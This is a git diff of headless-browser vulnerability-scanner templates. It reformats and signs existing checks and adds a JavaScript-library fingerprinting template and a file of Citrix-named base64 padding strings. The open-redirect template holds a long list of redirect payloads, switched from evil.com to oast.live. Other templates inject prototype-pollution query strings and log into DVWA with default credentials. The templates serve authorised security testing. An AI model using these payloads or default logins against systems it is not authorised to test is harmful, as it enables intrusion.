4a0a004730450220156c7817e33c48d906821587c273a5b1ecd3ed8996c0616e7468f27a46d04aec022100893e4c2dce9b2668a6643dd2fbe05f4a536c3b2df1e7223d971503333da4fb7f:922c64590222798bb761d5b6d8e72950 diff --git a/headless/dvwa-headless-automatic-login.yaml b/headless/dvwa-headless-automatic-login.yaml index bd48c62f5e..3a081daaaf 100644 --- a/headless/dvwa-headless-automatic-login.yaml +++ b/headless/dvwa-headless-automatic-login.yaml @@ -5,37 +5,45 @@ info: author: pdteam severity: high tags: headless,dvwa - headless: - steps: - args: url: "{{BaseURL}}/login.php" action: navigate + - action: waitload + - args: by: x xpath: /html/body/div/div[2]/form/fieldset/input action: click + - action: waitload + - args: by: x value: admin xpath: /html/body/div/div[2]/form/fieldset/input action: text + - args: by: x xpath: /html/body/div/div[2]/form/fieldset/input[2] action: click + - action: waitload + - args: by: x value: password xpath: /html/body/div/div[2]/form/fieldset/input[2] action: text + - args: by: x xpath: /html/body/div/div[2]/form/fieldset/p/input action: click + - action: waitload matchers-condition: or @@ -49,3 +57,5 @@ headless: type: word words: - "First time using DVWA" + +# digest: 4b0a00483046022100a040c6c41b9b5b1e73efb018f1cb4fe227565b54bc2aa67dd53e374a885999c9022100fb4ec11f7241e354adad5e019ccd2fdf8fba164935dfaefde071678428bf66a0:922c64590222798bb761d5b6d8e72950 diff --git a/headless/extract-urls.yaml b/headless/extract-urls.yaml index 2d7a1060d9..40b87a2c52 100644 --- a/headless/extract-urls.yaml +++ b/headless/extract-urls.yaml @@ -5,7 +5,6 @@ info: author: dwisiswant0 severity: info tags: headless,extractor - headless: - steps: - args: @@ -27,3 +26,5 @@ headless: part: extract kval: - extract + +# digest: 490a00463044022031e553c8190574cff294753710c45f40bc61c469150be726251c0e3f94c0397802203c2964ee2de769ed4d7d436732cedcb514265eb39418c1be8514c967fa06103d:922c64590222798bb761d5b6d8e72950 diff --git a/headless/headless-open-redirect.yaml b/headless/headless-open-redirect.yaml index c1d1593659..6312cf4e2e 100644 --- a/headless/headless-open-redirect.yaml +++ b/headless/headless-open-redirect.yaml @@ -11,116 +11,111 @@ info: cvss-score: 6.1 cwe-id: CWE-601 tags: redirect,generic,headless - headless: - steps: - args: url: '{{BaseURL}}/{{redirect}}' action: navigate - - action: waitload + - action: waitload payloads: redirect: - - '%0a/evil.com/' - - '%0d/evil.com/' - - '%00/evil.com/' - - '%09/evil.com/' - - '%5C%5Cevil.com/%252e%252e%252f' - - '%5Cevil.com' - - '%5cevil.com/%2f%2e%2e' - - '%5c{{RootURL}}evil.com/%2f%2e%2e' - - '../evil.com' - - '.evil.com' - - '/%5cevil.com' - - '////\;@evil.com' - - '////evil.com' - - '///evil.com' - - '///evil.com/%2f%2e%2e' - - '///evil.com@//' - - '///{{RootURL}}evil.com/%2f%2e%2e' - - '//;@evil.com' - - '//\/evil.com/' - - '//\@evil.com' - - '//\evil.com' - - '//\tevil.com/' - - '//evil.com/%2F..' - - '//evil.com//' + - '%0a/oast.live/' + - '%0d/oast.live/' + - '%00/oast.live/' + - '%09/oast.live/' + - '%5C%5Coast.live/%252e%252e%252f' + - '%5Coast.live' + - '%5coast.live/%2f%2e%2e' + - '%5c{{RootURL}}oast.live/%2f%2e%2e' + - '../oast.live' + - '.oast.live' + - '/%5coast.live' + - '////\;@oast.live' + - '////oast.live' + - '///oast.live' + - '///oast.live/%2f%2e%2e' + - '///oast.live@//' + - '///{{RootURL}}oast.live/%2f%2e%2e' + - '//;@oast.live' + - '//\/oast.live/' + - '//\@oast.live' + - '//\oast.live' + - '//\toast.live/' + - '//oast.live/%2F..' + - '//oast.live//' - '//%69%6e%74%65%72%61%63%74%2e%73%68' - - '//evil.com@//' - - '//evil.com\tevil.com/' - - '//https://evil.com@//' - - '/<>//evil.com' - - '/\/\/evil.com/' - - '/\/evil.com' - - '/\evil.com' - - '/evil.com' - - '/evil.com/%2F..' - - '/evil.com/' - - '/evil.com/..;/css' - - '/https:evil.com' - - '/{{RootURL}}evil.com/' - - '/〱evil.com' - - '/〵evil.com' - - '/ゝevil.com' - - '/ーevil.com' - - '/ーevil.com' - - '<>//evil.com' - - '@evil.com' - - '@https://evil.com' - - '\/\/evil.com/' + - '//oast.live@//' + - '//oast.live\toast.live/' + - '//https://oast.live@//' + - '/<>//oast.live' + - '/\/\/oast.live/' + - '/\/oast.live' + - '/\oast.live' + - '/oast.live' + - '/oast.live/%2F..' + - '/oast.live/' + - '/oast.live/..;/css' + - '/https:oast.live' + - '/{{RootURL}}oast.live/' + - '/〱oast.live' + - '/〵oast.live' + - '/ゝoast.live' + - '/ーoast.live' + - '/ーoast.live' + - '<>//oast.live' + - '@oast.live' + - '@https://oast.live' + - '\/\/oast.live/' - 'evil%E3%80%82com' - - 'evil.com' - - 'evil.com/' - - 'evil.com//' - - 'evil.com;@' - - 'https%3a%2f%2fevil.com%2f' - - 'https:%0a%0devil.com' - - 'https://%0a%0devil.com' - - 'https://%09/evil.com' - - 'https://%2f%2f.evil.com/' - - 'https://%3F.evil.com/' - - 'https://%5c%5c.evil.com/' - - 'https://%5cevil.com@' - - 'https://%23.evil.com/' - - 'https://.evil.com' - - 'https://////evil.com' - - 'https:///evil.com' - - 'https:///evil.com/%2e%2e' - - 'https:///evil.com/%2f%2e%2e' - - 'https:///evil.com@evil.com/%2e%2e' - - 'https:///evil.com@evil.com/%2f%2e%2e' - - 'https://:80#@evil.com/' - - 'https://:80?@evil.com/' - - 'https://:@\@evil.com' - - 'https://:@evil.com\@evil.com' - - 'https://;@evil.com' - - 'https://\tevil.com/' - - 'https://evil.com/evil.com' - - 'https://evil.com/https://evil.com/' - - 'https://www.\.evil.com' - - 'https:/\/\evil.com' - - 'https:/\evil.com' - - 'https:/evil.com' - - 'https:evil.com' - - '{{RootURL}}evil.com' - - '〱evil.com' - - '〵evil.com' - - 'ゝevil.com' - - 'ーevil.com' - - 'ーevil.com' - - 'redirect/evil.com' - - 'cgi-bin/redirect.cgi?evil.com' - - 'out?evil.com' - - 'login?to=http://evil.com' - + - 'oast.live' + - 'oast.live/' + - 'oast.live//' + - 'oast.live;@' + - 'https%3a%2f%2foast.live%2f' + - 'https:%0a%0doast.live' + - 'https://%0a%0doast.live' + - 'https://%09/oast.live' + - 'https://%2f%2f.oast.live/' + - 'https://%3F.oast.live/' + - 'https://%5c%5c.oast.live/' + - 'https://%5coast.live@' + - 'https://%23.oast.live/' + - 'https://.oast.live' + - 'https://////oast.live' + - 'https:///oast.live' + - 'https:///oast.live/%2e%2e' + - 'https:///oast.live/%2f%2e%2e' + - 'https:///oast.live@oast.live/%2e%2e' + - 'https:///oast.live@oast.live/%2f%2e%2e' + - 'https://:80#@oast.live/' + - 'https://:80?@oast.live/' + - 'https://:@\@oast.live' + - 'https://:@oast.live\@oast.live' + - 'https://;@oast.live' + - 'https://\toast.live/' + - 'https://oast.live/oast.live' + - 'https://oast.live/https://oast.live/' + - 'https://www.\.oast.live' + - 'https:/\/\oast.live' + - 'https:/\oast.live' + - 'https:/oast.live' + - 'https:oast.live' + - '{{RootURL}}oast.live' + - '〱oast.live' + - '〵oast.live' + - 'ゝoast.live' + - 'ーoast.live' + - 'ーoast.live' + - 'redirect/oast.live' + - 'cgi-bin/redirect.cgi?oast.live' + - 'out?oast.live' + - 'login?to=http://oast.live' stop-at-first-match: true - matchers-condition: and matchers: - type: word part: body words: - - "evil.com" - - "Evil.Com - We get it...Daily." - condition: and + - "Interactsh Server" -# Enhanced by cs on 2023/03/10 +# digest: 4a0a00473045022100c7175ea919883a8343276bcad26eacb03ea1d11acf34766c0886ff7f2959d4c502200cc7004d3fb430c1d1f8a222eee39415cc643a244f09012a23d8078d5654bd38:922c64590222798bb761d5b6d8e72950 diff --git a/headless/postmessage-outgoing-tracker.yaml b/headless/postmessage-outgoing-tracker.yaml index d1259b7c54..cb94491b85 100644 --- a/headless/postmessage-outgoing-tracker.yaml +++ b/headless/postmessage-outgoing-tracker.yaml @@ -68,4 +68,5 @@ headless: - type: kval part: alerts kval: - - alerts \ No newline at end of file + - alerts +# digest: 4b0a0048304602210086257806d07e03db948397827002ce802d2268c9b897c1a4e71ade20b22b222202210094f84b0a083d95efd50b36f5fd9765eae6ccb657332c21af2ded2d6f754bce13:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/headless/postmessage-tracker.yaml b/headless/postmessage-tracker.yaml index c38d7b601f..dce8bfce76 100644 --- a/headless/postmessage-tracker.yaml +++ b/headless/postmessage-tracker.yaml @@ -69,3 +69,4 @@ headless: part: alerts kval: - alerts +# digest: 490a0046304402203e9bd9f021bbf2a081ac817e6f8381e39f6507e40a22659ebed4a8402fea0d1202204f1d217045fc3577876bf20765baa2c6880a41fbf940c426dbdd2d96289e04e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/headless/prototype-pollution-check.yaml b/headless/prototype-pollution-check.yaml index 02abe08509..03ccfdc4c4 100644 --- a/headless/prototype-pollution-check.yaml +++ b/headless/prototype-pollution-check.yaml @@ -5,7 +5,6 @@ info: author: pdteam severity: medium tags: headless - headless: - steps: - args: @@ -21,12 +20,12 @@ headless: () => { return window.vulnerableprop } - matchers: - type: word part: extract words: - "polluted" + - steps: - args: url: "{{BaseURL}}?constructor.prototype.vulnerableprop=polluted#constructor.prototype.vulnerableprop=polluted" @@ -41,7 +40,6 @@ headless: () => { return window.vulnerableprop } - matchers: - type: word part: extract2 @@ -62,12 +60,12 @@ headless: () => { return window.vulnerableprop } - matchers: - type: word part: extract3 words: - "polluted" + - steps: - args: url: "{{BaseURL}}?__proto__.vulnerableprop=polluted" @@ -82,9 +80,10 @@ headless: () => { return window.vulnerableprop } - matchers: - type: word part: extract4 words: - "polluted" + +# digest: 4a0a004730450220656faedcca72b80b1fedb471f40b5f961c48f425ff85367123613007e7c1e92a022100dfb11f7b5f3e0c8b25b48808ab2410e43c3d99c56daa615aa928145ef4153457:922c64590222798bb761d5b6d8e72950 diff --git a/headless/screenshot.yaml b/headless/screenshot.yaml index 6fbd650c75..74f4f90090 100644 --- a/headless/screenshot.yaml +++ b/headless/screenshot.yaml @@ -6,11 +6,9 @@ info: severity: info description: Takes a screenshot of the specified URLS. tags: headless,screenshot - variables: filename: '{{replace(BaseURL,"/","_")}}' dir: "screenshots" - headless: - steps: - action: setheader @@ -24,8 +22,11 @@ headless: url: "{{BaseURL}}" - action: waitload + - action: screenshot args: fullpage: "true" mkdir: "true" - to: "{{dir}}/{{filename}}" \ No newline at end of file + to: "{{dir}}/{{filename}}" + +# digest: 4b0a0048304602210091c9beac07c9254df49005ea5694b15cfbeb5bb00c122273782a207dcb9a1819022100f3b0e99d774c680a7fdbbcc2a632b437b3bab3e21ca0387e010737b5b035c6c0:922c64590222798bb761d5b6d8e72950 diff --git a/headless/technologies/js-libraries-detect.yaml b/headless/technologies/js-libraries-detect.yaml new file mode 100644 index 0000000000..5ce7160082 --- /dev/null +++ b/headless/technologies/js-libraries-detect.yaml @@ -0,0 +1,347 @@ +id: js-libraries-detect + +info: + name: Common JS Libraries - Detection + author: adamparsons,cbadke,ChetGan,ErikOwen,jacalynli + severity: info + description: Checks a target web app for inclusion of common JavaScript libraries + metadata: + max-request: 1 + tags: headless,tech,js +headless: + - steps: + - action: navigate + args: + url: "{{BaseURL}}" + + - action: waitload + + - action: script + name: fingerprintAxios + args: + code: | + () => { + //check for axios + if (!window.axios) { + return "" + } + + try { + // check for version + // only works on some websites + return window.axios.VERSION + } catch (e) {} + + return "Version not found" + } + + - action: script + name: fingerprintBootstrap + args: + code: | + () => { + try { + // if not using jQuery + return bootstrap.Tooltip.VERSION || "" + } catch (e) {} + + try { + // if using jQuery + return $.fn.tooltip.Constructor.VERSION || "" + } catch (e) {} + + return "" + } + + - action: script + name: fingerprintJQuery + args: + code: | + () => { + let version = ""; + try { + if(window.jQuery) { + version = jQuery.fn.jquery; + } + if(window.$) { + version = $.fn.jquery; + } + version = version.replace(".min", ""); + version = version.replace(".slim", ""); + return version; + } catch (e) {} + + return ""; + } + + - action: script + name: fingerprintLodash + args: + code: | + () => { + try { + return _.VERSION || ""; + } catch (e) {} + return ""; + } + + - action: script + name: fingerprintMomentJs + args: + code: | + () => { + try { + return moment.version || ""; + } catch (e) {} + return ""; + } + + - action: script + name: fingerprintReact + args: + code: | + () => { + try { + return window.React.version || ""; + } catch (e) {} + return ""; + } + + - action: script + name: fingerprintReactDOM + args: + code: | + () => { + try { + if (window.ReactDOM) { + return window.React.version || ""; + } + } catch (e) {} + return ""; + } + + - action: script + name: fingerprintAngular + args: + code: | + () => { + + try { + // Angular Version 1 + return angular.version.full + } catch (e) {} + + try { + // Angular Version 2+ + return getAllAngularRootElements()[0].attributes["ng-version"].value + } catch (e) {} + + return "" + } + + - action: script + name: fingerprintBackboneJs + args: + code: | + () => { + + try { + return window.Backbone.VERSION || "" + } catch (e) {} + return "" + } + + - action: script + name: fingerprintEmberJs + args: + code: | + () => { + try { + return Ember.VERSION || "" + } catch (e) {} + return ""; + } + + - action: script + name: fingerprintVue + args: + code: | + () => { + + //method 1 (simple) + try { + return Vue.version + } catch (e) {} + + //method 2 (checks if Nuxt exists) + try { + const nuxtDetected = Boolean(window.__NUXT__ || window.$nuxt) + if (nuxtDetected) { + let Vue + } + if (window.$nuxt) { + Vue = window.$nuxt.$root.constructor + } + return Vue.version + } catch (e) {} + + //method 3 (go through all elements) + try { + const all = document.querySelectorAll('*') + let flag + for (let i = 0; i < all.length; i++) { + if (all[i].__vue__) { + flag = all[i] + break + } + } + if (flag) { + let Vue = Object.getPrototypeOf(flag.__vue__).constructor + while (Vue.super) { + Vue = Vue.super + } + return Vue.version + } + return "" + } catch (e) {} + return "" + } + + - action: script + name: fingerprintDojoJs + args: + code: | + () => { + try { + return ([dojo.version.major, dojo.version.minor, dojo.version.patch].join(".")) + } catch (e) {} + return "" + } + + - action: script + name: fingerprintDomPurify + args: + code: | + () => { + try { + return DOMPurify.version || "" + } catch (e) {} + return "" + } + + - action: script + name: fingerprintModernizr + args: + code: | + () => { + try { + return Modernizr._version || "" + } catch (e) {} + return "" + } + + matchers-condition: or + matchers: + - type: dsl + dsl: + - len(fingerprintAxios) > 0 + - len(fingerprintBootstrap) > 0 + - len(fingerprintJQuery) > 0 + - len(fingerprintLodash) > 0 + - len(fingerprintMomentJs) > 0 + - len(fingerprintReact) > 0 + - len(fingerprintReactDOM) > 0 + - len(fingerprintAngular) > 0 + - len(fingerprintBackboneJs) > 0 + - len(fingerprintEmberJs) > 0 + - len(fingerprintVue) > 0 + - len(fingerprintDojoJs) > 0 + - len(fingerprintDomPurify) > 0 + - len(fingerprintModernizr) > 0 + + extractors: + - name: axios + type: regex + part: fingerprintAxios + regex: + - ^(0|[1-9]\d*)\.(0|[1-9]\d*)\.(0|[1-9]\d*)(?:-((?:0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\.(?:0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\+([0-9a-zA-Z-]+(?:\.[0-9a-zA-Z-]+)*))?$ + + - name: bootstrap + type: regex + part: fingerprintBootstrap + regex: + - ^(0|[1-9]\d*)\.(0|[1-9]\d*)\.(0|[1-9]\d*)(?:-((?:0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\.(?:0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\+([0-9a-zA-Z-]+(?:\.[0-9a-zA-Z-]+)*))?$ + + - name: jquery + type: regex + part: fingerprintJQuery + regex: + - ^(0|[1-9]\d*)\.(0|[1-9]\d*)\.(0|[1-9]\d*)(?:-((?:0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\.(?:0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\+([0-9a-zA-Z-]+(?:\.[0-9a-zA-Z-]+)*))?$ + + - name: lodash + type: regex + part: fingerprintLodash + regex: + - ^(0|[1-9]\d*)\.(0|[1-9]\d*)\.(0|[1-9]\d*)(?:-((?:0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\.(?:0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\+([0-9a-zA-Z-]+(?:\.[0-9a-zA-Z-]+)*))?$ + + - name: moment + type: regex + part: fingerprintMomentJs + regex: + - ^(0|[1-9]\d*)\.(0|[1-9]\d*)\.(0|[1-9]\d*)(?:-((?:0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\.(?:0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\+([0-9a-zA-Z-]+(?:\.[0-9a-zA-Z-]+)*))?$ + + - name: react + type: regex + part: fingerprintReact + regex: + - ^(0|[1-9]\d*)\.(0|[1-9]\d*)\.(0|[1-9]\d*)(?:-((?:0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\.(?:0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\+([0-9a-zA-Z-]+(?:\.[0-9a-zA-Z-]+)*))?$ + + - name: reactdom + type: regex + part: fingerprintReactDOM + regex: + - ^(0|[1-9]\d*)\.(0|[1-9]\d*)\.(0|[1-9]\d*)(?:-((?:0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\.(?:0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\+([0-9a-zA-Z-]+(?:\.[0-9a-zA-Z-]+)*))?$ + + - name: angular + type: regex + part: fingerprintAngular + regex: + - ^(0|[1-9]\d*)\.(0|[1-9]\d*)\.(0|[1-9]\d*)(?:-((?:0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\.(?:0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\+([0-9a-zA-Z-]+(?:\.[0-9a-zA-Z-]+)*))?$ + + - name: backbone + type: regex + part: fingerprintBackboneJs + regex: + - ^(0|[1-9]\d*)\.(0|[1-9]\d*)\.(0|[1-9]\d*)(?:-((?:0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\.(?:0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\+([0-9a-zA-Z-]+(?:\.[0-9a-zA-Z-]+)*))?$ + + - name: emberjs + type: regex + part: fingerprintEmberJs + regex: + - ^(0|[1-9]\d*)\.(0|[1-9]\d*)\.(0|[1-9]\d*)(?:-((?:0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\.(?:0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\+([0-9a-zA-Z-]+(?:\.[0-9a-zA-Z-]+)*))?$ + + - name: vuejs + type: regex + part: fingerprintVue + regex: + - ^(0|[1-9]\d*)\.(0|[1-9]\d*)\.(0|[1-9]\d*)(?:-((?:0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\.(?:0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\+([0-9a-zA-Z-]+(?:\.[0-9a-zA-Z-]+)*))?$ + + - name: dojo + type: regex + part: fingerprintDojoJs + regex: + - ^(0|[1-9]\d*)\.(0|[1-9]\d*)\.(0|[1-9]\d*)(?:-((?:0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\.(?:0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\+([0-9a-zA-Z-]+(?:\.[0-9a-zA-Z-]+)*))?$ + + - name: dompurify + type: regex + part: fingerprintDomPurify + regex: + - ^(0|[1-9]\d*)\.(0|[1-9]\d*)\.(0|[1-9]\d*)(?:-((?:0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\.(?:0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\+([0-9a-zA-Z-]+(?:\.[0-9a-zA-Z-]+)*))?$ + + - name: modernizr + type: regex + part: fingerprintModernizr + regex: + - ^(0|[1-9]\d*)(?:\.(0|[1-9]\d*))?(?:\.(0|[1-9]\d*))?(?:-((?:0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\.(?:0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\+([0-9a-zA-Z-]+(?:\.[0-9a-zA-Z-]+)*))?$ + +# digest: 4a0a004730450220451c605a35e3b3a0bb15c0b3af18d432417660d1ceb67d64d5412ced6d2a58d0022100bae60594c866a2cab9623cefdb57b536383227050ed923361241a58746568210:922c64590222798bb761d5b6d8e72950 diff --git a/headless/technologies/sap-spartacus.yaml b/headless/technologies/sap-spartacus.yaml index b72bda5790..ff0ba686ab 100644 --- a/headless/technologies/sap-spartacus.yaml +++ b/headless/technologies/sap-spartacus.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: tech,sap,hybris,angular,spartacus,headless - headless: - steps: - action: navigate @@ -30,3 +29,5 @@ headless: type: word words: - "ng-version=" + +# digest: 4a0a00473045022008f3444cd60177a88b4086f721dc7f85d2a31e852b050dab91fc1547033a6775022100caf8b7a57841dcf535346f532b6bd9e94cd9657adc4cc59561ea800edcb497e2:922c64590222798bb761d5b6d8e72950 diff --git a/headless/window-name-domxss.yaml b/headless/window-name-domxss.yaml index 063a0577e8..419ea013cb 100644 --- a/headless/window-name-domxss.yaml +++ b/headless/window-name-domxss.yaml @@ -92,5 +92,4 @@ headless: part: alerts kval: - alerts - -# Enhanced by mp on 2022/09/14 +# digest: 490a004630440220440ff260d9c59333dc1481acd3df4e4c68997bb43f6834f8e0dc24f522d7bbc3022038a8a9ab98ef7c71a0f749a408a2bc682fd38954282666b671651ee2df5f77c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/helpers/payloads/citrix_paddings.txt b/helpers/payloads/citrix_paddings.txt new file mode 100644 index 0000000000..4497c2fa5b --- /dev/null +++ b/helpers/payloads/citrix_paddings.txt @@ -0,0 +1,256 @@ +QUFBQUFBQUFBQUFBQUFBAEFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBAUFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBAkFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBA0FBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBBEFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBBUFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBBkFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBB0FBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBCEFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBCUFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBCkFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBC0FBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBDEFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBDUFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBDkFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBD0FBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBEEFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBEUFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBEkFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBE0FBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBFEFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBFUFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBFkFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBF0FBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBGEFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBGUFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBGkFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBG0FBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBHEFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBHUFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBHkFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBH0FBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBIEFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBIUFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBIkFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBI0FBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBJEFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBJUFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBJkFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBJ0FBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBKEFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBKUFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBKkFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBK0FBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBLEFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBLUFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBLkFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBL0FBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBMEFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBMUFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBMkFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBM0FBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBNEFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBNUFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBNkFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBN0FBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBOEFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBOUFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBOkFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBO0FBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBPEFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBPUFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBPkFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBP0FBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBQEFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBQkFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBQ0FBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBREFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBRUFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBRkFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBR0FBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBSEFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBSUFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBSkFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBS0FBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBTEFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBTUFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBTkFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBT0FBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBUEFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBUUFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBUkFBQUFBQUFBQUFBQUFBQUE= +QUFBQUFBQUFBQUFBQUFBU0FBQUFBQUFBQUFBQUFBQUE= 